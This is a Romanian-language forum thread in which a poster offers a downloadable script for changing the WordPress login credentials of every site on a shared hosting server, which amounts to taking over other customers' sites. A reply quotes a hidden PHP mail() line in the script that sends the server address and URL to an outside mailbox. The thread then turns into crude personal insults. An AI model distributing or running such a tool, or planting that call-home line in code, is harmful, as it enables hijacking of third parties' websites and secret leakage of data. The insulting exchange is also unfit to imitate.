d4rkm4nx99 Posted July 3, 2013 Report Posted July 3, 2013 am gasit un script cu care puteti schimba userul si parola de la wordpress la toate domeniile care au instalate wordpress pe acel server.Este de ajuns sa aveti webhosting pe acel server si sa uploadati fisierele dupa care sa rulati. https://mega.co.nz/#!hphFmZga!QN_ByTNWyhzqKxgc6Vu5dXMlsNlLi-RXhKGBg-9hHu4G.L. Quote
Brenin Posted July 3, 2013 Report Posted July 3, 2013 (edited) ... Edited January 4, 2014 by Brenin Quote
d4rkm4nx99 Posted July 3, 2013 Author Report Posted July 3, 2013 (edited) mail('d00m@kumanova.com.mk',$_SERVER['SERVER_ADDR'],$url);Nici nu mai verific .exe-ulNe pare rau ca nu ai parinti, dar modul in care cersesti mancare cu ultimele thread-uri deschise de tine nu e frumos. Am un amic cu o ferma de porci, iar porcarul care se ocupa de deseurile din cotet a plecat in concediu in Thailanda. Te poate angaja el acolo. Nu poate sa iti ofere multe, dar un loc de dormit langa ei si o strachina de supa de corcoduse si paine de mamaliga iti poate da in fiecare zi.Casa de copii nu e pe net. am zis ca am gasit nu e facut de mine nu te obliga nimeni sa-l instalez pe server.daca chiar vrei sa faci ceva modifica scriptul si fa-l pe bune daca crezi ca are .exe cat despre comportamentul tau ce sa zic: ca tine am cu ziua la sapa.....sunt satul. Edited July 3, 2013 by d4rkm4nx99 Quote
Brenin Posted July 3, 2013 Report Posted July 3, 2013 (edited) ... Edited January 4, 2014 by Brenin Quote
d4rkm4nx99 Posted July 3, 2013 Author Report Posted July 3, 2013 (edited) esti ultima mizerie din societate! Edited July 4, 2013 by d4rkm4nx99 Quote